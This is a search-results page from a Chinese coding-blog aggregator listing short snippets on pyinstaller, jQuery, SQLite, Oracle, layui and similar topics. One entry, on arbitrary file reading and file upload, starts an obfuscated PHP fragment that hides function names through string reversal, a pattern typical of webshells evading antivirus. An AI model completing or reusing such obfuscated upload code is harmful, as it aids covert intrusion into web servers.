码迷,mamicode.com
首页 >  
搜索关键字:move av    ( 6611个结果
tkinter 打包成exe可执行文件
1.安装pyinstaller pip install pyinstaller 2.打包 打开cmd,切换到需要打包的文件(demo.py)目录。执行 pyinstaller -F -w demo.py。 生成的exe文件就在子目录dist中。-F表示指定打包后只生成一个exe格式的文件,-w表示窗 ...
分类:其他好文   时间:2020-05-18 12:40:14    阅读次数:199
jquery 使用技巧(持续更新中)
一、jquery 属性操作 1、增加和删除属性 $("#id").attr("data-index",4),$("#id").removeAttr("data-index");自定义属性,建议使用attr $("#checkbox").prop("checked",false), $("#check ...
分类:Web程序   时间:2020-05-18 10:49:27    阅读次数:65
jquery监听input
$(function(){ //输入框正在输入时 $("#ipt").on('input',function(){ if(!($('#ipt').val()=='')){ $(".cancle_ico").removeClass('hide'); }else{ $(".cancle_ico").ad ...
分类:Web程序   时间:2020-05-18 00:33:00    阅读次数:83
2.23骰子游戏
#写一个骰子游戏 import random class Game: def __init__(self,player1,player2): self.player1 = player1 self.player2 = player2 def star_game(self): self.player1 ...
分类:其他好文   时间:2020-05-17 22:01:42    阅读次数:87
安卓开发之SQLite(数据的增删改查)
SQLite的数据库中表的增删改查(下面用添加,删除,更新,查询) 以下关于一些布局的按钮就不贴代码了. 添加代码:SQLiteDatabase中提供了一个insert()方法,它接受三个参数,第一个参数是表名;第二个三叔用于在未指定添加数据的情况下给某些可为空的列自动赋值null;第三个参数是一个 ...
分类:移动开发   时间:2020-05-17 00:57:31    阅读次数:91
oracle中的用户详解 【转】
oracle中的用户详解 【转】 原创 Linux操作系统 作者:可爱灰狼 时间:2013-09-17 17:56:07 2895 0 http://f.dataguru.cn/thread-128531-1-1.html oracle中的用户很多,也很令初学者费解.oracle中的帐户分为两类:一 ...
分类:数据库   时间:2020-05-16 14:04:24    阅读次数:86
caterpillar tree
In graph theory, a caterpillar or caterpillar tree is a tree in which all the vertices are within distance 1 of a central path. The central path can b ...
分类:其他好文   时间:2020-05-15 18:05:19    阅读次数:77
layui弹框自适应高度
layui弹框自适应高度
分类:其他好文   时间:2020-05-15 17:24:58    阅读次数:819
任意文件读取 move_uploaded_file文件上传
任意文件读取 move_uploaded_file文件上传 <?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."e ...
分类:Web程序   时间:2020-05-15 15:27:12    阅读次数:75
js实现多物体运动
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document< ...
分类:Web程序   时间:2020-05-15 11:41:24    阅读次数:67
6611条   上一页 1 ... 34 35 36 37 38 ... 662 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!